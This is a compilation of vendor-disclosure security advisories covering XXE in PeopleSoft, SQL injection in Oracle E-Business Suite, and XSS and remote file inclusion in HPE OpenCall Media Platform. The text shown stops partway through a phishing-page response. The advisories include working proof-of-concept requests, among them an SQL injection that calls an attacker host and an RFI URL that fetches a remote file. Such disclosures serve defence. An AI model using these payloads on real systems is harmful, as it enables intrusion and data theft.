PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
A malicious user can modify an XML-based request to include XML
content that is then parsed locally.
4. VULNERABLE PACKAGES
PeopleSoft HCM 9.2 on PeopleTools 8.55
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU April 2017
6. AUTHOR
Nadya Krivdyuk
7. TECHNICAL DESCRIPTION
An attacker can use an XML external entity vulnerability to send
specially crafted unauthorized XML requests, which will be processed
by the XML parser. The attacker can use an XML external entity
vulnerability for getting unauthorised access to the OS file system.
PoC
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: 172.16.2.91:8000
Content-type: text/xml
<!DOCTYPE a PUBLIC "-//B/A/EN" "C:\windows">
8. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
9. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
Application: Oracle E-Business Suite
Versions Affected: Oracle EBS 12.2.3
Vendor URL: http://oracle.com
Bug: SQL injection
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Dmitry Chastuhin (ERPScan)
Description
1. ADVISORY INFORMATION
Title:[ERPSCAN-17-021] SQL Injection in E-Business Suite IESFOOTPRINT
Advisory ID: [ERPSCAN-17-021]
Risk: high
CVE: CVE-2017-3549
Advisory URL: https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/
Date published: 18.04.2017
Vendors contacted: Oracle
2. VULNERABILITY INFORMATION
Class: SQL injection
Impact: read sensitive data, modify data from database
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVSS Base Score v3: 8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
The code comprises an SQL statement containing strings that can be
altered by an attacker. The manipulated SQL statement can be used then
to retrieve additional data from the database or to modify the data
without authorization.
4. VULNERABLE PACKAGES
Oracle EBS 12.2.3
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU April 2017
6. AUTHOR
Dmitry Chastuhin
7. TECHNICAL DESCRIPTION
PoC
vulnerable jsp name is iesfootprint.jsp
deployDate = ((request.getParameter("deployDate")) != null) ?
request.getParameter("deployDate") : "";
responseDate = ((request.getParameter("responseDate")) != null) ?
request.getParameter("responseDate") : "";
dscriptName = ((request.getParameter("dscript_name")) != null) ?
request.getParameter("dscript_name") : "";
dscriptId = ((request.getParameter("dscriptId")) != null) ?
request.getParameter("dscriptId") : "";
%>
<%
// Process the data based on params
if (showGraph) {
// Create Query String
StringBuffer query = new StringBuffer("SELECT panel_name,
count_panels, avg_time, min_time, max_time, ");
query.append("\'").append(_prompts[10]).append("\'");
query.append(" Average_Time FROM (SELECT rownum, panel_name,
count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name,
count(panel_name) count_panels,
(sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000
min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE
dscript_id = ");
query.append(dscriptId);
query.append(" AND start_time between ");
query.append("\'").append(deployDate).append("\'");
query.append(" and ");
query.append("\'").append(responseDate).append("\'");
query.append(" GROUP BY panel_name ORDER BY avg_time desc)) WHERE
rownum < 11");
// Get XMLDocument for the corresponding query and Paint graph
try {
XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());
htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);
Approximate request with SQL injection
http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11'
AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY
panel_name)) --
8. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
9. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
Source: https://blogs.securiteam.com/index.php/archives/3087
SSD Advisory – HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities
Want to get paid for a vulnerability similar to this one?
Contact us at: ssd@beyondsecurity.com
Vulnerabilities Summary
The following advisory describes Reflected Cross-Site Scripting (XSS)
vulnerabilities and a Remote File Inclusion vulnerability that when
combined can lead to Code Execution, were found in HP OpenCall Media
Platform (OCMP), version 4.3.2.
HPE OpenCall Media Platform (OCMP) is a suite of software and hardware
applications which allow implementation of common telecom operator
services such as voicemail, sms (short message service), prepaid,
billing, hlr, etc. It implements industry standard telecom protocols
and standards such as SS7, ISUP, TCAP, SIP, MRCP, RTSP, and VoiceXML.
HPE OpenCall Media Platform offers a highly scalable, easy-to-manage,
carrier-grade media platform that adapts to future networks and
applications. Through its strong support of open standards and
protocols, new applications can be rapidly developed and deployed in a
way that preserves investments and reduces capital expenditures
(CAPEX) and operational expenditure (OPEX).
There are 3 different components that are vulnerable in HPE OpenCall
Media Platform (OCMP), and for each component has the following
vulnerabilities:
Application Content Manager
Reflected Cross-Site Scripting (XSS) – /mcm/resources/
Platform Administration Tool
Reflected Cross-Site Scripting (XSS) that lead to Remote Code Execution
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE0 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE1 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE2 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE3 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME0 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME1 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME2 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME3 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NUM parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, NAME parameter
Reflected Cross-Site Scripting (XSS) – cdrdispatch function, next parameter
Reflected Cross-Site Scripting (XSS) – cdrdispatch function, sessionType parameter
VoiceXML Administration Tool
Reflected Cross-Site Scripting (XSS) – event.do function
Reflected Cross-Site Scripting (XSS) – call.do function
Remote File Inclusion – proxylink.do function
Credit
An independent security researcher Paolo Stagno from VoidSec has
reported this vulnerability to Beyond Security’s SecuriTeam Secure
Disclosure program.
Vendor Responses
HPE has released patches to address this vulnerability, for more details see:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03686en_us
Vulnerabilities Details
Application Content Manager – /mcm/resources/
HPE OpenCall Media Platform (OCMP) does not sanitize /mcm/resources/
“description” and “prototype” parameters input. An attacker can inject
malicious Java script to trigger the Reflected Cross-Site Scripting
(XSS).
Proof of Concept
An Attacker send the following POST request to the victims machine :
POST https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?followindirection=false
HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/mcm+json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html
Content-Length: 54
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{ "": "", "description": "<script>alert(1);</script>"}
The server will respond with:
HTTP/1.1 204 No Content
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Date: Wed, 23 Sep 2015 16:13:35 GMT
Server: Web Server
Then the attacker will send the second request to trigger the
Cross-Site Scripting (XSS):
GET https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?format=json&followindirection=false&ms=1443024815924
HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html
Connection: keep-alive
The server will respond with:
HTTP/1.1 200 OK
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-control: no-cache
Content-Type: application/json
Transfer-Encoding: chunked
Date: Wed, 23 Sep 2015 16:13:35 GMT
Server: Web Server
VoiceXML Administration Tool – call.do function
HPE OpenCall Media Platform (OCMP) does not sanitize call.do function
parameters input. An attacker can inject malicious Java script to
trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /om/call.do?action=list_calls&type=XSS_HERE
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /om/call.do?action=list_calls&type=Active637a3<script>alert(1)<%2fscript>c7e9f
HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://127.0.0.1:5443/om/servicegroup.do?action=addservicegroup
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B
The server will respond with:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache,no-store
Expires: Thu, 01 Jan 1970 01:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 10 Sep 2015 13:30:41 GMT
Content-Length: 10418
<HTML>
<HEAD>
<TITLE>VoiceXML Environment Operation and Maintenance on tb0ocmp0</TITLE>
<LINK REL="stylesheet"
HREF="consolepages/templates/stylesheets/style.css" TYPE="text/css">
</HEAD>
<BODY>
<script type="text/javascript">
//HV Menu v5- by Ger Versluis (www.burmees.nl)
//Submitted to Dynamic Drive (www.dynamicdrive.com)
//Visit www.dynamicdrive.com for this script and more
function Go(){return}
</script>
<script type="text/javascript"
src="consolepages/templates/js/exmplmenu_var.jsp"></script>
<script type="text/javascript"
src="consolepages/templates/js/menu_com.js"></script>
<noscript>Your browser does not support script</noscript>
<TABLE WIDTH="800" BORDER="0">
<TR>
<TD><IMG SRC="consolepages/templates/images/speechweb.gif"/></TD>
</TR>
<TR>
<TD VALIGN="top">
Logged on as: zerpsta1 <SPAN id="warn">
</SPAN>
<BR><BR><BR><BR>
<br>
<b>Call Management -> Active637a3<script>alert(1)</script>c7e9f Calls</b>
<br><br><br>
<table border="1" width="1000">
<tr><td colspan="12" class="tableheader">Calls <a href="#"><img
src="consolepages/templates/images/questionmark.gif" border="0"
onClick="window.open('help.do?prompt=p20', 'help',
'toolbar=no,width=400,height=400,resizable=no,scrollbars=yes');"></a></td></tr>
<tr><td colspan="12"> </td></tr>
<tr>
<td><b><a href=call.do?action=sort_calls&type=node>Server Id</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=callid>CallId</a></b></td>
<td><b>CDR</b></td>
<td><b>Call Monitoring</b></td>
<td><b>Service Id</b></td>
<td><b><a href=call.do?action=sort_calls&type=ruri>Remote-URI</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=luri>Local-URI</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=severe>Severes</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=warning>Warnings</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=vxml_exception>VoiceXML
Exceptions</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=time>Started At</a></b></td>
<td><b>Duration</b></td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp1</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_3</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_3&node=tb0ocmp1">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470521123</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=vxml_exception
target="new">21</a></td>
<td>150909 19:00:52.429</td><td>00:00:00.502</td>
</tr>
<tr>
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_2</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_2&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470174023</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=vxml_exception
target="new">21</a></td>
<td>150908 19:29:05.236</td><td>00:00:00.501</td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp1</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_2</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_2&node=tb0ocmp1">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470852423</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=vxml_exception
target="new">21</a></td>
<td>150908 19:27:56.237</td><td>00:00:01.003</td>
</tr>
<tr>
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_1</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_1&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470632723</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=vxml_exception
target="new">21</a></td>
<td>150907 18:57:21.548</td><td>00:00:01.004</td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp1</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_1</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_1&node=tb0ocmp1">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470277023</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=vxml_exception
target="new">21</a></td>
<td>150907 15:13:19.660</td><td>00:00:01.003</td>
</tr>
<tr>
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_0</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_0&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470860823</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=vxml_exception
target="new">21</a></td>
<td>150907 15:12:15.254</td><td>00:00:00.501</td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_0</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_0&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_3xxx">o2_ivr_3xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1540003000009388</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=ERROR
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=vxml_exception
target="new">0</a></td>
<td>150907 15:00:13.901</td><td>00:00:45.194</td>
</tr>
</table>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
VoiceXML Administration Tool – event.do function
HPE OpenCall Media Platform (OCMP) does not sanitize event.do function
parameters input. An attacker can inject malicious Java script to
trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /om/event.do?action=list&type=XSS_HERE
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /om/event.do?action=list&type=Active637a3<script>alert(1)<%2fscript>c7e9f
HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://172.27.116.32:5443/om/call.do?action=trace_calls&type=trace_calls
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 172.27.116.32:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B
The server will respond with:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2437
Date: Thu, 10 Sep 2015 13:32:55 GMT
<HTML>
<HEAD>
<TITLE>VoiceXML Environment Operation and Maintenance on tb0ocmp0</TITLE>
<LINK REL="stylesheet"
HREF="consolepages/templates/stylesheets/style.css" TYPE="text/css">
</HEAD>
<BODY>
<script type="text/javascript">
//HV Menu v5- by Ger Versluis (www.burmees.nl)
//Submitted to Dynamic Drive (www.dynamicdrive.com)
//Visit www.dynamicdrive.com for this script and more
function Go(){return}
</script>
<script type="text/javascript"
src="consolepages/templates/js/exmplmenu_var.jsp"></script>
<script type="text/javascript"
src="consolepages/templates/js/menu_com.js"></script>
<noscript>Your browser does not support script</noscript>
<TABLE WIDTH="800" BORDER="0">
<TR>
<TD><IMG SRC="consolepages/templates/images/speechweb.gif"/></TD>
</TR>
<TR>
<TD VALIGN="top">
Logged on as: zerpsta1 <SPAN id="warn">
</SPAN>
<BR><BR><BR><BR>
<script language="JavaScript">
function toggleVisibility( divId, buttonId ) {
if( document.all[divId].style.display == 'none' ) {
document.all[divId].style.display = 'inline';
document.all[buttonId].value = 'Hide Stacktrace';
} else {
document.all[divId].style.display = 'none';
document.all[buttonId].value = 'Show Stacktrace';
}
}
</script>
<br>
<b>Active637a3<script>alert(1)</script>c7e9f</b>
<br><br>
<form action="event.do">
<input type="submit" value="Reset" name="submit" onClick="return
confirm('Are you sure you want to remove all
Active637a3<script>alert(1)</script>c7e9f?')">
<input type="hidden" name="action" value=reset >
<input type="hidden" name="type"
value="Active637a3<script>alert(1)</script>c7e9f">
</form>
<br><br>
<table border="1" width="1200">
<tr><td colspan="8" class="tableheader">Events <a href="#"><img
src="consolepages/templates/images/questionmark.gif" border="0"
onClick="window.open('help.do?prompt=p21', 'help',
'toolbar=no,width=400,height=400,resizable=no,scrollbars=yes');"></a></td></tr>
<tr><td colspan="8"> </td></tr>
<tr>
<td><b><a href=event.do?action=sort&type=NODE >Server Id</a></b></td>
<td><b><a href=event.do?action=sort&type=TIME >Date</a></b></td>
<td><b><a href=event.do?action=sort&type=CALL >CallId</a></b></td>
<td><b>CDR</b></td>
<td><b>Service Id</b></td>
<td><b>Message</b></td>
</tr>
<tr><td colspan="8"> </td></tr>
<tr><td colspan="8">No Items Found</td></tr>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
VoiceXML Administration Tool – proxylink.do function
HPE OpenCall Media Platform (OCMP) does not sanitize proxylink.do
function parameters input. An attacker can inject malicious URL to
including remote files. After the attacker include the file, the HPE
OpenCall Media Platform will parse and execute the content of the
file.
The vulnerable URL: /om/proxylink.do?url=Remote File Inclusion Here (RFI)
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /om/proxylink.do?url=http://172.27.120.220:9595/fruuuuk.txt HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 172.27.116.32:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5D8C311BBE2784FB2CE6DB970878D3CA
The server will respond with:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2565
Date: Wed, 09 Sep 2015 13:00:53 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>PHISHING LOGIN PAGE</title>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<link rel="Shortcut Icon" href="/login/images/hp.ico">
<script>
